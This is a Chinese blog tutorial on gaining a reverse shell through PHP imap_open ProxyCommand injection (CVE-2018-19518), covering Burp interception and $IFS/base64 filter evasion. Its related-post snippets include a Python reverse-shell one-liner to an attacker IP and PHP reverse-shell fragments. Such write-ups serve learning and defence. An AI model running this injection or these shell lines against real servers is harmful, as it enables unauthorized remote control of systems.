利用PHP imap反弹shell

原创 已于 2022-09-03 23:16:54 修改 · 置顶 · 388 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #shell #经验分享 #其他

于 2020-03-29 23:33:47 首次发布
本文探讨了PHP的imap扩展如何通过imap_open函数的ProxyCommand选项导致命令执行。利用debian系统中ssh替代rsh的行为,攻击者可以构造特定参数反弹shell。通过base64编码和替换空格来绕过解析限制,最终在靶机上成功反弹shell。

imap为什么可以?

php imap扩展用于在PHP中执行邮件收发操作,它可以通过这种协议从邮件服务器上获取邮件的信息。其imap_open函数会调用rsh来连接远程shell,而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说,在debian系列系统中,执行rsh命令实际执行的是ssh命令)。因为ssh命令中可以通过设置-o ProxyCommand来调用第三方命令,攻击者通过注入这个参数,最终将导致命令执行。

漏洞利用

该站点监听在8080,ip:8080即可。

在这些框中随便输入参数,使用burpsuite抓包。发送到Repeater模块来修改hostname参数的值。在这里我们可以使用ProxyCommand参数执行命令。

ProxyCommand是什么?

ProxyCommand是一个指定用于连接服务器的命令。当我们执行以下这条命令时,可以发现即便我们没有建立与localhost的SSH连接,也会创建文件。

至此就知道了可以通过-oProxyCommand参数来执行系统命令。

但是我们不能直接将上述命令直接转移到PHP脚本来代替imap_open服务器地址,因为在解析时它会将空格解释为分隔符和斜杠作为标志。但是我们可以使用\$IFS这个shell变量来替换空格符号或使用\t替换。还可以在bash中使用Ctrl + V热键和Tab键插入标签。要想绕过斜杠,也可以使用base64编码和相关命令对其进行解码。替换空格符的\t也可以换成$IFS$()

最低0.47元/天 解锁文章
利用 Nginx 畸形解析漏洞 getshell
weixin_45253622的博客
12-09 3824
Nginx Nginx 是一款轻量级的Web 服务器/反向代理服务器及电子邮件IMAP/POP3)代理服务器,在BSD-like 协议下发行。其特点是占有内存少,并发能力强,事实上nginx的并发能力确实在同类型的网页服务器中表现较好。 漏洞描述: 对于任意文件名,在后面添加/xxx.php(xxx为任意字符)后,即可将文件作为php解析。 例:info.jpg后面加上/xxx.php,会将info.jpg 以php解析。 漏洞原理: 查看 nginx 配置文件: cd /home/ch1/Desktop
PHP imap 远程命令执行漏洞复现(CVE-2018-19518)
0xSec
12-27 1604
IMAP是在系统中执行任何命令的桥梁。Internet消息访问协议IMAP)是电子邮件客户端用于通过TCP / IP连接从邮件服务器检索电子邮件的Internet标准协议IMAP由Mark Crispin于1986年设计为远程邮箱协议,与广泛使用的POP(一种用于检索邮箱内容的协议)形成对比。目前,IMAP由RFC 3501定义规格。IMAP的设计目标是允许多个电子邮件客户端完全管理电子邮件收件箱。因此,客户端通常会在服务器上保留消息,直到用户明确删除它们为止。
PHP脚本反弹SHELL
10-20
此脚本可以反弹SHELL到指定地址,得到交互交shell
shell tr 替换 空格_利用PHP imap反弹shell
weixin_39731456的博客
12-08 198
imap为什么可以?php imap扩展用于在PHP中执行邮件收发操作,它可以通过这种协议邮件服务器上获取邮件的信息。其imap_open函数会调用rsh来连接远程shell,而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说,在debian系列系统中,执行rsh命令实际执行的是ssh命令)。因为ssh命令中可以通过设置-o ProxyCommand来调用第三方命...
php反弹,php反弹shell实现代码
weixin_39532754的博客
03-10 559
遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。非常无 奈,没想 到什么好的办法,后来灵光一闪。放一个php页面,里面 可以直接弹回来shell,何况在console下面操作比webshell方便的多,也不会出现超时之类的情况。因为我不怎么懂php,于是就找了猥琐 的诺诺和小雨修改了一下代码,反弹代码是从phpsp...
PHP反弹shell
痴人说梦梦中人
09-26 7859
步骤详解: 前提: ①、PHPStudy开启相关服务。 ②、假设木马已上传至服务器且可以访问(即执行代码才能反弹shell)。 ③、攻击机器和受害服务器要处于同一网段。 1、划线为攻击机的IP+端口。 2、攻击机监听自身端口4444,即可获取执行shell。 <?php set_time_limit(0); $ip=$_POST['ip']; $port=$_POST['port'];...
php反弹shell脚本
a1_pha的博客
01-24 1975
用msfvenom也可以生成反弹shell脚本,但有时候用不了。
[Vulhub] PHP imap远程命令执行漏洞(CVE-2018-19518)
weixin_45605352的博客
05-08 2581
0x01 预备知识 PHPimap_open函数中的漏洞可能允许经过身份验证的远程攻击者在目标系统上执行任意命令。 php imap扩展用于在PHP中执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian / ubuntu中用来使用ssh来代替rsh的功能(即在debian系列系统中,执行rsh命令)实际执行的是ssh命令)。 因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞。 如果启用了
[BUUCTF][蓝帽杯 2021]One Pointer PHP
cosmoslin的博客
11-15 1897
考点 PHP数组溢出 绕过open_basedir 攻击php-fpm绕过disable functions Suid提权 源码 user.php <?php class User{ public $count; } ?> add_api.php <?php include "user.php"; if($user=unserialize($_COOKIE["data"])){ $count[++$user->count]=1; if($count[]=1){ $user
PHP Webshell 下的反弹 Shell
XtAbap的博客
10-08 762
Webshell 是一种常见的恶意软件,它允许攻击者通过一个受感染的网站来执行远程命令和控制目标服务器。其中一种常见的攻击技术是通过 Webshell 反弹一个 Shell 连接,以便攻击者能够直接与目标服务器进行交互并执行命令。通过编写一个 PHP 脚本,我们可以在目标服务器上建立一个反向连接,并与攻击者的机器进行交互。然而,使用 Webshell 进行非法活动是违法的,且严重违反道德和法律规定。要实现反弹 Shell,我们需要编写一个 PHP 脚本,该脚本将作为 Webshell 在目标服务器上执行。
php反弹shell实现代码
10-30
遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。
php反弹shell代码,反弹shell.php
weixin_31491381的博客
03-29 739
function which($pr){$path = execute("which $pr");return ($path ? $path : $pr);}function execute($cfe) {$res = '';if ($cfe) {if(function_exists('exec')) {@exec($cfe,$res);$res = join("\n",$res);}elseif...
PHP代码实现反弹shell
E1even的博客
08-28 4123
打靶机的时候遇到了,有时候反弹效果失败,下面这个PHP代码基本可以通杀 转载至链接:https://www.cnblogs.com/alex-13/p/3667790.html <?php function which($pr) { $path = execute("which $pr"); return ($path ? $path : $pr); } function execute($cfe) { $res = ''; if ($cfe) { if(function_exists(
可解析PHP反弹shell方法
最新发布
06-14 1702
这里拿vulnhub-DC-8靶场反弹shell,详情见。
反弹Shell,看这一篇就够了
Appleteachers的博客
04-24 1536
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
反弹shell脚本
Soul Blog
11-23 3382
反弹shell及其脚本 一、反弹shell的各种姿势 python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.1",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-
实战攻击-php反弹shell
网络安全领域优质创作者
11-05 4304
以下均为实际攻击过程,记录笔记,仅供学习参考 whatweb10.11.1.8:80cms识别 dirbhttp://10.11.1.8/ 目录扫描 dirbuster输入链接,选择线程,使用字典,选择字典,设置fuzz为dir/{dir}开始扫描 Python3 dirsearch.py -uurl-e php扫描目录 得到http://10.11.1.8/internal/ 目录,查看源码发现/internal/advanced_c...
反弹shell
weixin_43227251的博客
04-14 429
什么是反弹shell? 简单理解,通常是我们主动发起请求,去访问服务器某个IP的某个端口,比如我们常访问的web服务器:http/https://ip:80,这是因为在服务器上面开启了80端口的监听,我们去访问它的时候,就会给我们建立连接。而现在所谓的反弹shell指的是反过来在我们自己的公网vps建立监听,然后让服务器反弹一个shell来连接我们自己的主机,然后我们就能通过反弹shell去远程...
反弹shell脚本(php-reverse-shell
Aluxian_的博客
10-01 2152
反弹shell脚本
基于Python实现的邮件反弹Shell技术解析
在本例中,我们讨论的是利用Python实现的邮件触发反弹shell,即通过邮件来确定反弹地址。这意味着攻击者可以发送一个含有特定命令的邮件给目标服务器,当目标服务器运行包含恶意代码的邮件处理脚本时,会在攻击者...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值